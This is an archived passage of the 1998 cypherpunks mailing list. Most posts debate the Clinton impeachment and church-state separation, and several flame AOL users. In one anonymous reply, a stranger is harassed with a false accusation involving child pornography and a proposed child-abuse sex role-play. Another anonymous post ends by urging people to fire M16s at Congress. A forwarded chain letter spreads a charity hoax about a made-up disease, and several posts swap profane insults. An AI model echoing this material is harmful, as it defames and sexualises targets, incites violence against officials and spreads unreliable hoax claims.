>May I note also that crude atheism is more related with a Church
>with its dogmas. They all create a fixed mind and the reduction
>of human dignity that follows.
>
>To avoid equivokes:
>Religion has nothing to do with 'faith' or 'Churches'
>A man may be an atheist and be religious. It is a more intimate 
>characteristic than beliefs.
>A prist may not be religious at all... as often happens.
>
>(The equivoke will happen to those who have no insight on the word 
>'religion'... only of its use and misuse.)
>
>And it will always surprise me to see words used in the inverse 
>sense of themselves, like the use of the word 'freedom' in its 
>inverse sense.
>
>May be because of this that todays Big-tyrants and small ones all
>using words they do not understand and being elected or posting
>angry replies in the name of what they insidiously destroy.
>
>I'm not condemning, only noting. 
>And this because it is simply a question of understanding.
>After all... we all carry our private prisons with us.
>
>Regards, (yes, why not?)
>Dutra de Lacerda.
I agree with you completely when you state that religion, ethics, and 
law are distinct and different things.  Unfortunately in the United 
States they have a strong tendency to become intertwined.  The law as it 
stands is that impeachment is only to be used in cases of high crimes 
and misdemeanors.  Now I have not read the entire Starr report nor do I 
have a sophisticated background in law nevertheless nothing Bill has 
done seems to qualify as worthy of impeachment under the law.  However, 
the sexual acts and behaviour exhibited by him is deeply repugnant to 
many on ethical grounds and particularly repugnant to Christians 
specifically.  I do not have any problem at all with those who are 
disgusted by the presidents behaviour on ethical or religious grounds, I 
personally find it repulsive.  I do however feel, as I believe you are 
saying also,  that the law is law.  It should be executed in a fair and 
just manner and according to the letter ( which may or may not lead to 
impeachment ).  The previous poster to which I replied seemed to be very 
clearly stating that his personal religious code of ethics took 
precedence over american legal codes,  a viewpoint which I cannot agree 
with.  All debate on the precice origin and validity of 'seperation of 
church and state' aside I cannot recall any part of the constitution 
which invokes divine justice.  The impeachment issue is not one of 
ethics or religion, simply law and law alone.

Vivek Vaidya




______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 18:03:19 +0800
To: cypherpunks@toad.com
Subject: Re: Hello
Message-ID: <199809152257.AAA05018@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I found your name on a kiddy porn site.  At first I was disgusted, and
immediately called the FBI.  But then I got kind of turned on by the
whole idea, and decided that maybe we could get together and have
hot sex, and you could wear a wig with pigtails, and it would be just
like we were screwing children, just like I know you love to do.  Then
maybe we could switch roles.

So anyway, let me know if you're interested.  But also, expect the
FBI to be calling on you in the near future, pervert!

Tah tah lovey,
Joe C.


At 06:14 PM 9/15/98 -0400, Christopher Barkley wrote:
>You listed me in Six Degrees as your fellow alum, but I'm afraid I can't
>place you.  So, who are you?
>
>Cheers,
>Christopher
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 16 Sep 1998 01:14:52 +0800
To: attila <attila@hun.org>
Subject: Re: Clinton still doesnt get it
In-Reply-To: <Pine.BSF.3.96.980915003703.7119C-100000@hun.org>
Message-ID: <Pine.SOL.3.96.980916004143.25010H-100000@cavern.uark.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, attila wrote:

Well, I've been working for a couple of days and spent the weekend before
that with The Report. I read all of it, including the footnotes, every
damn one of them, and they're where all the good stuff is, btw.  Given
that weekend study, it's apparent to me, after reviewing several days
of posts on this topic on this list, that most of you people can't
or don't read or have the attention spans of gnats.  

The perjury case has some serious reasonable doubt problems, the
abuse of power case is thin, thin, and the executive privilege 
stuff is there as sheer trade goods to give Congress something
to throw out.  In legal parlance, it wouldn't pass Rule 11.
And I don't know who is giving you legal advice, but there's
no sexual harrassment count in the thing.  Read it, if you can.
Peferably after your medication.

Much of what you guys have had to say about this matter since
Friday is hilarious, much of it pungent, some of it poingnant,
and even some of it accurate.  But mostly pretty ignorant and
beneath your usual standard. One of you had the good sense to
post the column i repost below, because that fellow seems to
have gotten a pretty good handle on this squalid mess.  

But punks . . . well, punks . . . a few years ago when I first
subscribed to this list, to lurk and learn, as I still mostly
do, there were some hardasses you could depend on to come out
of the woodwork when things got way out of space, and they'd 
say: Punks write code. 

And they were write.
MacN

> 
> New York Times
> September 13, 1998 
> IN AMERICA/By BOB HERBERT 
> Still Doesn't Get It 
> 
> David Maraniss, in his biography of Bill Clinton, "First in His Class," 
> writes about an "intense relationship" that Mr. Clinton had with a 
> young woman who had volunteered to work in his first campaign for 
> public office. Mr. Clinton was running for Congress and the woman was a 
> student at the University of Arkansas. 
> 
> A campaign aide, quoted in the book, said, "The staff tried to ignore it as 
> long as it didn't interfere with the campaign." But it did interfere, because 
> Mr. Clinton was also intensely involved with Hillary Rodham. 
> 
> Mr. Maraniss writes: "The tension at campaign headquarters increased 
> considerably when Rodham arrived as people there tried to deal with the 
> situation. Both women seemed on edge. The Arkansas girlfriend would ask 
> people about Hillary: what she was like, and whether Clinton was going to 
> marry her. When she was at headquarters, someone would sneak her out 
> the back door if Rodham was spotted pulling into the driveway." 
> 
> It was all there more than two decades ago at the very beginning of Bill 
> Clinton's political journey: the thoughtlessness, the recklessness, the 
> wanton use of friends and associates to cover up his ugly behavior, the 
> willingness to jeopardize the hopes and dreams of people who were 
> working for him and trusted him, the betrayal of those closest to him. 
> 
> There is nothing new in Kenneth Starr's report, just confirmation in 
> extreme and at times lurid detail of the type of person Mr. Clinton has 
> always been. 
> 
> In 1992, when he was running for President and people across the nation 
> were investing their time, money and even their careers in him, he 
> rewarded them with the Gennifer Flowers scandal. He carried his 
> psychodrama onto national television when he went on "60 Minutes" and, 
> with Mrs. Clinton at his side, called Ms. Flowers a liar. 
> 
> He told Steve Kroft and 30 million viewers: "It was only when money came 
> up, when the tabloid went down there offering people money to say that 
> they had been involved with me, that she changed her story. There's a 
> recession on, times are tough, and I think you can expect more and more 
> of these stories as long as they're down there handing out money." 
> 
> In other words, it was the economy, stupid. 
> 
> But even as he was denying that he had had a sexual relationship with 
> Gennifer Flowers, Mr. Clinton was going out of his way on "60 Minutes" to 
> convey to the public that he had learned a lesson, that he had matured 
> and that his irresponsible behavior would not be a problem if he were 
> elected President. 
> 
> "I have absolutely leveled with the American people," he said. 
> 
> In fact, his comments were about as level as the Himalayas. We now know 
> that he was willing to risk everything, his family, his Presidency, the 
> welfare of the nation, on a dangerous fling with a White House intern. For 
> him, it must have been great fun. He got to play so many people for fools. 
> He got to chat on the phone with Congressmen while engaging in sex. He 
> got to play hide and seek with the Secret Service. 
> 
> Very mature behavior. 
> 
> Now the Clinton psychodrama has much of the Government paralyzed 
> and the Democratic Party in a state of panic. But Mr. Clinton still doesn't 
> get it. On Thursday he met with the members of his Cabinet, who had 
> been duped and lied to like so many others. He went into his emotional 
> routine and said he was oh-so-sorry, etc. He begged for forgiveness. 
> 
> But he got upset when the Secretary of Health and Human Services, 
> Donna Shalala, said that she was appalled by his behavior. Ms. Shalala 
> complained that the President seemed to believe that pursuing his 
> policies and programs was more important than providing moral 
> leadership. 
> 
> A story in The Washington Post said Mr. Clinton responded sharply to Ms. 
> Shalala, rebuking her. My understanding is that his response was critical 
> but not harsh. Either way, it's clear that Mr. Clinton has not learned the 
> requisite lessons. He lied to Ms. Shalala months ago and sent her out to lie 
> to the public, and now he's criticizing her. The President is not sorry. He's 
> apologizing because there's a gun at his head. He's not changing what he 
> now describes as his sinful ways. He's trying to manipulate public opinion 
> so he can survive to sin again. The psychodrama remains as long as he 
> remains. 
> 
> There are no surprises here. With Bill Clinton, it was ever thus. 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 16 Sep 1998 00:27:01 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Democracy...
In-Reply-To: <35FF220A.F88B87F6@hempseed.com>
Message-ID: <3.0.2.32.19980916012129.007f46c0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

And while we are on the subject, nothing gets to me quite so easily 
as self-styled educated men who cannot spell or form a grammatically 
correct sentence. You attempt to flame those whose logic is faulty 
and come off looking like ignorant boobs.

If you had done a little more reading in your past you would be able 
to recognize your own poor ability to communicate yet you rail on 
about the cluelessness of AOLers who haven't read the constitution. 
My question is how is it that you are able to read it?

I have pity for those who are products of the public school system 
but they have an excuse. What excuse do computer programmers have? 
They are forced to think logically yet so often refuse to do so in 
matters of real life. They often fall back upon the constitutionality 
of a particular concept yet haven't tested it with the power of their 
own sense of truth and justice.

Such is the substance of lawyers and politicians.

I recently saw a posting about right v. wrong or good v. evil. These 
are subjective terms as any good semanticist knows. But what is real 
and what is unreal is a much more difficult thing to determine. It 
requires rigorous thinking without prejudice or belief getting in the 
way.

As to law. The first of the Bill of Rights says:

Congress shall make no law respecting an establishment of religion, 
or prohibiting the free exercise thereof; or abridging the freedom of 
speech, or of the press; or the right of the people peaceably to 
assemble, and to petition the Government for a redress of grievances.

If you are going to quote something, do it fully and accurately. It 
isn't that hard and if you don't have a copy of the constitution 
laying around then either get one or keep your damn mouth shut until 
you know what you are talking about.

No, the words "seperation of church and state" do not appear but then 
neither does "privacy", but it is damn well implied by the 4th 
amendment. 

Those self-righteous pricks who want bible reading in the schools and 
rail against those who recite the 1st amendment either lack 
understanding of the term "reading" or are being dishonest by 
insisting that disallowing teachers to read the bible to students is 
wrong and that the constitution needs to be amended. Anyone with any 
honesty would realize that the first amendment doesn't prohibit bible 
reading by students or even bible study in a historical context. It 
merely prohibits tax-paid teachers from "respecting an establishment 
of religion, or prohibiting the free exercise thereof;". If I see 
just one more bible-thumping zealot message about "would you care to 
show us where "seperation of church and state" is to be found in the 
constitution/bill of rights?" I will be tempted to take him out in 
the parking lot and pound sand into the parts which are unaccustomed 
to this substance.

I am all for separation of school and state. Show me where in the 
constitution/bill of rights everyone is entitled to a theft/tax 
funded education. This would solve church and state in schools 
wouldn't it. If you don't like your kids getting a non-religious 
education from the godless state, you are free to pull them out and 
put them into a private school of your choice. But of course it isn't 
your kids you are worried about is it? It's all those other peoples 
kids that aren't getting the benefit of the word of the one true 
Christian god that you want to help isn't it!

Hypocrisy is the Vaseline(tm) of political intercourse!

Edwin E. Smith


At 08:39 PM 9/15/98 -0700, you wrote:
>At 7:27 PM -0700 9/15/98, Jaeger wrote:
>>hey, would you care to show us where "seperation of church and 
state" is
>>to be found in the constitution/bill of rights?  absolute right and
>
>Gee, check out the First Amendment to the U.S. Constitution. Also 
the first
>item in the Bill of Rights. "Congress shall make no law respecting 
the
>establishment of religion or prohibiting the free exercise 
thereof..."
>(from memory, so don't bother me with minor wording corrections.)
>
>By standard convention, this is also referred to as "separation of 
church
>and state."
>
>As with the clueless AOLers yakking about an "Assimov" story they 
read a
>couple of years ago in the 5th grade, you bozos need to get educated 
and
>spend a minute or two thinking before writing.
>
>
>--Tim May
>

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf9K10mNf6b56PAtEQLRZwCeL9bBfYwsdjQ06iTNlSu/j1YGmn0AoMTy
2U/bC+Bpmp9BlqrRXNPv0eCS
=cdUv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Wed, 16 Sep 1998 00:56:56 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Democracy...
In-Reply-To: <3.0.2.32.19980916003108.007cfbf0@mailhost.IntNet.net>
Message-ID: <3.0.2.32.19980916015110.007b29a0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

twit, v.t, twitted, twitting. address teasingly.

I'm touched! You think I'm teasing you? Well, I'm NOT teasing you. 
You're an ASSHOLE! Yes I spelled it correctly so there wouldn't be 
any misunderstanding. You're a self-righteous prick who dumps on 
people just because they have a certain email address without any 
consideration for what they may be saying. Yes there are clueless 
people at AOL and there are clueless people at got.net and at 
intnet.net. So what?

When you cut yourself off from people just because of their email 
address you do yourself a disservice but when you try to dissuade 
others because of your prejudice then you wrong us as well. I am 
quite able to evaluate the worthiness of someones words without your 
superior pronouncements.

If you don't have anything of value to add to the discussion then 
shut-the-fuck-up!

Edwin

At 09:43 PM 9/15/98 -0700, you wrote:
>At 9:31 PM -0700 9/15/98, Edwin E. Smith wrote:
>
>>
>>Only a minute or two? How many minutes does it take to be able to
>>correctly spell the name of somebody you are deprecating?
>>
>
>The only _name_ mentioned in my post was "Assimov." This must be the
>"correctly spell the name of...." example you are citing.
>
>This spelling was deliberate, based on the AOL guy citing his 5th 
grade
>reading of it...
>
>As for you, you're still a twit.
>

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNf9RzUmNf6b56PAtEQJUywCg/d+IFyZeUWGvytpdxR85CuHS05YAoLyB
bkSyv+E6WRZXewM0LEIS2jcZ
=OdGi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chiu Ngan" <simpsonngan@hotmail.com>
Date: Wed, 16 Sep 1998 03:58:42 +0800
To: vanessa.ho@mailexcite.com
Subject: Fwd: I don't care if this is real or not! But forwarding is not hard for me if I help
Message-ID: <19980916085139.13597.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




>Received: from 136.148.1.253 by www.hotmail.com with HTTP;
>	Tue, 15 Sep 1998 05:55:15 PDT
>X-Originating-IP: [136.148.1.253]
>From: "Dodwell Leung" <dodwellleung@hotmail.com>
>To: alexccl@hotmail.com, z2181727@student.unsw.edu.au, 
antonylam@hotmail.com, chonga@sbu.ac.uk, z2183890@student.unsw.edu.au, 
lcy@qms.ndirect.co.uk, z2155343@student.unsw.edu.au, bahrid@hotmail.com, 
daner@mail.mkv.mh.se, Evert.P.deVries@SI.shell.com, 
harold.tan@mailexcite.com, ivanyip@hotmail.com, catkoo@hotmail.com, 
jennyshek@hotmail.com, BKKsomporb@mail.nomura.com.hk, 
joe621@netvigator.com, heyloe@hotmail.com, kmyk@hotmail.com, 
kenjess@apanet.com.au, lawhon@hotmail.com, lfan@mail.uoknor.edu, 
95481624J@hkpucc.polyu.edu.hk, shukai@netvigator.com, 
z2188635@student.unsw.edu.au, mattgow@hotmail.com, 
z2192026@student.unsw.edu.au, z2174314@student.unsw.edu.au, 
Steeve.Genot@wanadoo.fr, hsp996@hotmail.com, physpot@asiaonline.net, 
pixie_tan@hotmail.com, pooi_lee_chow@hotmail.com, eeyatir@hotmail.com, 
saralee@chevalier.net, patelsu@sbu.ac.uk, beetch@pacific.net.sg, 
z2188232@student.unsw.edu.au, simpsonngan@hotmail.com, 
yoon@pacific.net.sg, hamster.sol@lineone.net, stepcom@hkstar.com, 
ext3366@yahoo.com, tinyau1@netvigator.com, z2193851@student.unsw.edu.au, 
huvl@sbu.ac.uk, z2193612@student.unsw.edu.au, willmilk@hotmail.com, 
wswinnie@netvigator.com, brackeye@hkstar.com, takleung@wisdom.com.hk
>Subject: I don't care if this is real or not! But forwarding is not 
hard for me if I help
>Content-Type: text/plain
>Date: Tue, 15 Sep 1998 05:55:15 PDT
>
>
>>Received: from 202.184.46.2 by www.hotmail.com with HTTP;
>>	Tue, 15 Sep 1998 01:39:48 PDT
>>X-Originating-IP: [202.184.46.2]
>>From: "san san" <seliness@hotmail.com>
>>To: alanling@usa.net, calviny@mol.net.my, chowpin@edb.gov.sg, 
>chan911@pc.jaring.my, gary_wang@hotmail.com, junifer@pl.jaring.my, 
>karren@deakin.edu.au, klay@okstate.edu, lkhoong@pc.jaring.my, 
>mcch@hotmail.com, murphy_l@hotmail.com, simfong@pl.jaring.my, 
>stchai@pl.jaring.my, mote@hotmail.com, tlliew@tm.net.my, 
>wthong@pl.jaring.my, dodwellleung@hotmail.com
>>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
>>Content-Type: text/plain
>>Date: Tue, 15 Sep 1998 01:39:48 PDT
>>
>>
>>>Received: from 202.188.25.160 by www.hotmail.com with HTTP;
>>>	Mon, 14 Sep 1998 06:27:23 PDT
>>>X-Originating-IP: [202.188.25.160]
>>>From: "Lim Huey" <shaohuey@hotmail.com>
>>>To: alexlimyk@hotmail.com, audrey.looi@mailexcite.com, 
>>kianwah19@hotmail.com, enyen@hotmail.com, s9812221@unitele.com.my, 
>>rckj@hotmail.com, seliness@hotmail.com, stanchow@tm.net.my, 
>>bhchua7@hotmail.com, csheng@rocketmail.com, yoongyow@hotmail.com, 
>>ching20@hotmail.com, lphoo@hotmail.com, ken_thong@rocketmail.com, 
>>twinsck@hotmail.com, poaysun@yahoo.com, mda97mk@sheffield.ac.uk, 
>>yongqiang13@hotmail.com, sammy_lee_79@hotmail.com, 
>>tungweileong@hotmail.com, lifesignx@yahoo.com, elim331@yahoo.com, 
>>lwloh@hotmail.com, audrey.looi@mailcity.com, sokyee@pc.jaring.my, 
>>kah_kit@hotmail.com, siewgar@hotmail.com, chiane@mailcity.com, 
>>Vvpenguin@hotmail.com, pkleong@hotmail.com, phangf@hotmail.com, 
>>rolandhii@hotmail.com, stjdanzel@hotmail.com, leesiehui@hotmail.com, 
>>jeennwei@hotmail.com, chouyong@hotmail.com, ttc1979@yahoo.com, 
>>guatyen@hotmail.com, chonkit@hotmail.com, thongyp@hotmail.com, 
>>soonfung@hotmail.com, tsueyyin@hotmail.com, feiyy@hotmail.com
>>>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
>>>Content-Type: text/plain
>>>Date: Mon, 14 Sep 1998 06:27:23 PDT
>>>
>>>
>>>
>>>
>>>>Date: Mon, 14 Sep 1998 04:25:43 -0700 (PDT)
>>>>From: CHEW JUNN WENG <jwchew@rocketmail.com>
>>>>Subject: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
>>>>To: lmoonc@hotmail.com, pvcheo@essex.ac.uk, cwnsim@essex.ac.uk,
>>>>  yoongyow@hotmail.com, lenelene@hotmail.com, gcping38@mailcity.com,
>>>>  gthong@rocketmail.com, ching20@hotmail.com, 
lcchuan@rocketmail.com,
>>>>  moon@tm.net.my, shaohuey@hotmail.com, janelsl@tm.net.my,
>>>>  csheng@rocketmail.com, hwooi@yahoo.com, dianacn@hotmail.com,
>>>>  stjdanzel@hotmail.com, effyjungle@hotmail.com, 
>bus_tard@hotmail.com,
>>>>  lphoo@hotmail.com, yakasaki@hotmail.com, colint79@hotmail.com
>>>>Cc: anniesia@hotmail.com, pearlng@hotmail.com, liangser@hotmail.com,
>>>>  choopar@hotmail.com
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>Hello, my name is David "Darren" Bucklew. I live in 
>>>>Pittsburgh PA where I attend Bethel Park High School
>>>>and participate in  many sports.  I have severe
>>>>ostriopliosis of the liver. (My liver is extremely 
>>>>inflamed).
>>>>Modern Science has yet to find a cure.  Valley
>>>>Childrens hospital 
>>>>> has agreed to donate  7 cents to the National
>>>>Diesese Society for every name 
>>>> on  this letter.Please send it around as much as you
>>>>can.
>>>>Thank you,
>>>>Darren
>>>>
>>>>PS: For those of you who dont take 5 minutes to do 
>>>>this, what goes around comes around. You can help
>>>>sick people, and it costs you nothing,yet you are too
>>>>lazy to do it?  You will get what you deserve. 
>>>>
>>>>_________________________________________________________
>>>>DO YOU YAHOO!?
>>>>Get your free @yahoo.com address at http://mail.yahoo.com
>>>>
>>>>
>>>
>>>
>>>______________________________________________________
>>>Get Your Private, Free Email at http://www.hotmail.com
>>
>>
>>______________________________________________________
>>Get Your Private, Free Email at http://www.hotmail.com
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rain Dog" <rain_dog_@hotmail.com>
Date: Wed, 16 Sep 1998 05:15:14 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <19980916100923.15676.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




AIMSX@aol.com wrote:
> 
> Actually.. I am getting a SunOS Shell account this weekend.  AOL has
> improved
> service somewhat, and it is now possible to use Netscape (or any other
> browser) along with it.

Of course, 32-bit AOL allows you to use all the TCP/IP protocols...

> As for me paying it... I just became old enough to work (finally)
> about a month ago, and I am only making minimum wage, and the hours
> are not good enough for me to be able to keep up my hobbies of 
paintball,
> computer upgrades, and Internet alone.

Do you follow these hobbies simultaneously, or do you do 'Internet-ing' 
as
a separate activity to paintballing your upgrades?
Isn't 'Internet-ing' similar to 'road-ing' or 'railway-ing'?

> Therefore... she pays for it, I wash dishes...

These two are related?

> ...not all AOLers are stupid warez lovers that don't know cu from cd.

Fine. Obvious. Not all arabs mug me in the streets of Jerusalem. Enough
have tried to make me wary. Why not shut the hell up bitching about how
much we hate AOL-ers and demonstrate some reason for being on this
list in the first place, other than 'Internet-ing'.

Tim G

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 16 Sep 1998 07:39:56 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Democracy...
In-Reply-To: <v03130306b224f2bc1149@[209.66.100.71]>
Message-ID: <Pine.GSO.3.95.980916052820.6927B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Indeed. There are two types of freedoms at issue here: establishment and
free exercise, which the Framers thought were complementary and the
Supreme Court has said "occasionally overlap." There were three
ideological positions that drove the clause forward: those who wanted to
prevent corruption of the church, those who wanted to prevent corruption
of the state (such as Jefferson), and those who wanted to protect the
church from the state. 

I haven't come across documents written by the Founders or cases that say
the "state CAN support one religion over another." Cites, please? The cass
I'm familiar with suggest exactly the opposite. The Supremes believe in
"the established principle that the Government must pursue a course of
complete neutrality toward religion." Supporting one religion over another
violates the rule against "forbidden effects." 

As Tim said, our new friend's interpretation is somewhat bizarre.

-Declan


On Tue, 15 Sep 1998, Tim May wrote:

> At 9:09 PM -0700 9/15/98, Jaeger wrote:
> >well, the first amendment is what I expected to be used...
> >unfortunately, the phrase "...wall of separation between church and
> >state" is not taken from the first amendment.  It is taken from a letter
> >written by Thomas Jefferson...  and the meaning is not that church
> >shouldn't have an effect on the state.  The state CAN support one
> >religion over another.
> 
> Ah, it's the appearance of a new ranter arguing for some bizarre,
> idiosyncratic interpretation of the Bill of Rights and suchlike. Mr.
> Jaeger, meet Mr. Choate.
> 
> Your notion that the state can support one religion over another so long as
> it does not "restrict" the other will surely be news to the many who have
> studied this issue for centuries. In particular, all those legal decisions
> which got Christian manger scenes removed from public buildings, and which
> got "Jesus Loves Sinners, Even Jews" removed from our coinage, will surely
> now have to be reversed.
> 
>  > The state CAN make laws that encourage the practice of any one
> >particular religion, as long as the laws do not RESTRICT the PRACTICE of
> >other religions.
> 
> 
> Bizarre. Try Ritalin. This has helped some list members cope.
> 
> --Tim May
> 
> 
> (This space left blank pending determ. of acceptability to the gov't.)
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Wed, 16 Sep 1998 04:53:22 +0800
To: Bill Stewart <cypherpunks@Algebra.COM
Subject: LAST WORD: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980914122452.0086a750@pop.mhv.net>
Message-ID: <3.0.5.32.19980916055715.00910cf0@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain



At 09:29 PM 9/15/98 -0700, you wrote:
>
>Obviously you Just Don't Get It.  :-)
>The argument tends to be along the lines that if power weren't
>so disparate, she wouldn't have to resort to sexual bribery to get 
>what she wants, she could just take it, or trade for it as an equal.
>
>Because, not being totally stupid about Clinton, she thought it might
>be convenient to have some evidence around after the fact?
>Whether that's for emotional blackmail, or basic blackmail, 
>or life insurance, or for convincing Hillary that Bill was hers now, 
>or convincing some future publisher that she hadn't made it all up, 
>or just because it seemed like it might turn out to be useful in the future,
>who knows.  Lots of possibilities.  Or maybe it was just a memento
>of a lovely evening :-)  Or of a time when she had the President
>wrapped around her little finger.


Bill -

I was pointing out that one (male or female) doesn't save such items of
unwashed clothing unless there's a distorted reason for doing so.  Like
you, I can only speculate as to why, but it reflects a premeditation on her
part - which supports my position that she's not a *victim*.

A woman who comes on to her male employer and, when he accepts her
"invitation", cannot turn around and allege: "Poor me.  I was a victim.  He
is so powerful."  I don't give a damn whether her employer was the
President or the chief janitor.  To contend otherwise is to suggest that
*every* woman in an executive position, private or public, slept her way to
get the position because of the initial imbalance of power.  I do not
accept this.

Clinton has chased skirts for most of his adult life (as an article which
was posted points out). As the "chaser", he's used his various positions of
power to his advantage, and I agree wholeheartedly that there's an
imbalance of power when he acted in this manner.

So, my bottom (and final) line is:

1.  Clinton has been a womanizer for most, if not all of his political life;

2.  Monica was not a victim in _this_ scenario;

3.  Clinton is guilty of perjury;

4.  Clinton used his friends to publicly support his lie and publicly
disgraced his daughter (Hillary's been through this before);

5.  My tax money has been spent to publish a report that he engages in
extra-marital sex and lies about it (gee, a real surprise!); and

6.  Even if I "Don't Get It" - Bill damned sure got it, and got it, and got
it... ;)






**********************************************************************
Lynne L. Harrison, Esq.          |  Never doubt that a small group
Poughkeepsie, New York           |  of citizens can change the world.
mailto:lharrison@dueprocess.com  |  Indeed, it is the only thing that
http://www.dueprocess.com        |  ever has. -- Margaret Mead
**********************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Wed, 16 Sep 1998 08:17:13 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
Message-ID: <ee797071bb2c2c75a08a0bd4d6fca61a@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Monday, September 14, 1998 - 23:20:36

Question: How is it, that the FBI has so much power?
Answer: Because 'the people' didn't do swat to stop them[the FBI].

Question: How do 'the people' change the situation?
Answer: 'The people' get out their banners and megaphones and march on the Congress.

Question: What do 'the people' do then they[Congress] don't hear 'the people'?
Answer: 'The people' go on strike.

Question: What do 'the people' do when Congress doesn't care about their strikes?
Answer: 'The people' fire their M16'eens at Congress which they brought with them.

Question: So where are 'the people'?      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 16 Sep 1998 06:10:21 +0800
To: nnburk@cobain.HDC.NET>
Subject: RE: Predictions: Crime and Criminal Justice in the 21st Century
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8423@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



>Sunder wrote:
>> 
>> nnburk wrote:
>> >
>> > Predictions: Crime and Criminal Justice in the 21st Century
>> > ...
>> > 2.      As the large pool of young people born in the early 1990s
>> > become teenagers and young adults, there will be a dramatic
>> > increase in violent crime around the year 2005-2010.
>> 
>> I don't necessarily see this.  What do you base this on?  
>
>Um, actually, not _my_ predictions. Source was local LEA, obtained by them
from some  
>nameless seminar. (Sorry. Should have made that point clear earlier.)

It's pretty standard I think - as most crime is committed by 
young men aged between 15 and 25, the more of them there are
around the more crime there is. So sociologists predict
more crime  20 years after a surge in the birth rate.

AFAIR it's also been observed that  violent crime goes up 
in times of increasing prosperity but crime against property
goes up in bad economic times.

Of course none of that explains the huge secular trends in 
crime. In UK crime of all sorts fell almost continually
from about 1700 (& there are no real records much
before then) till the middle of this century. Since then it has been
rising. Who knows why? 

And how come the US murder rate is maybe 8 or 10 times the UK?
(actually that is unfair because the definition of "murder" is stricter
here, but it is at least 4 times different). Are we nicer people?
Not likely - the rape & indecent assault are no better here, & 
burglary is worse. 

> > > 5.      As faith in the criminal justice system declines, there
> > > will be a rise in vigilante-based incidents where citizens take
> > > the enforcement of crime problems into their own hands.
> > 
> > The rest of your prediction sounds like you've watched Robocop a few
> times too
> > many and actually BELIEVED it! :)  Care to back it up with reasons?
> > 
> 
> See above. <grin> Actually, haven't seen Robocop!
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 15 Sep 1998 23:33:31 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <199809160426.GAA31537@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Some smart people do come from aol but then again they don't say
stupid stuff.  Aol will always be stereo typed until it is cleansed of
morons.  It is a stereotype based on truth.

Famous AOL saying: me too!






---AIMSX@aol.com wrote:
>
> Obviously you have a very high opinion of yourself and a low opinion
of people
> who use AOL.  Contrary to popular belief, there are a few
intelligent people
> on AOL, but it looks as if you are too egotistical to realize that.
> 
> Have you ever thought to look at your own mistakes before you
publicize
> everyone else's to the world?  Are you just suffering from some sort
of
> dillusion of grandeur - thinking you are better than everyone else. 
Things
> like this are what many wars were started over, I am so happy the
internet
> (hopefully) won't start a war in the real world.
> 
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
